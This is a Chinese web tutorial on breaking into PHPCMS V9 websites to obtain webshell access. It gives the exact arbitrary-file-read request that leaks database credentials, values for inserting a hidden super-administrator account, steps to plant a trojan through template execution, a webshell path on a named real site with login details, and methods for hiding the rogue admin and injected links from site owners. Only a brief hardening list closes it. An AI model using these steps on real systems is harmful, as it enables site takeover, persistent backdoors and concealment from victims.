当前位置:首页 > CMS教程 > phpcms > 列表

详解:利用PHPCMS V9漏洞入侵网站取得webshell权限

发布:smiling 来源: PHP粉丝网  添加日期:2014-10-22 11:07:00 浏览: 评论:0 

考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点甚至服务器及服务器所在网络。

湛蓝天空声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试和恶意破坏,以免在您技术水平不足的情况下暴露身份信息进而被追究法律责任。任何团体及个人由此引起的违法行为,湛蓝天空均不负法律连带责任。

本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)

1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。

例如将data.txt放置在http://yun.baidu.com/j0192/data.txt

2、通过v9漏洞获取配置信息。

/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号

  1. username字段:admn 
  2. password字段:10203d4623c1957d041818196ff9822a 
  3. encrypt 字段:bGV22e //phpfensi.com 
  4. issuper 字段: 1 

4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。

用户名:admn

密码:123456

5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。

6、打开http://www.ifeng.com/caches/caches_template/default/wap/data.class.php

用户名:admin

密码:admin

7、隐藏新增加的管理员。

通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。

8、隐藏新增加的关联链接

通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))

9、将目标网站的漏洞修复,以防其他黑客入侵。

通过木马脚本上传替换/phpcms/modules/search/index.php

防黑参考:

1、关闭数据库远程访问。

2、静态文件及附件等文件目录禁止执行权限。

3、脚本文件目录禁止写权限。

4、系统后台等重要目录限制IP访问。

5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。

Tags: PHPCMS漏洞权限 PHPCMS入侵网站

分享到: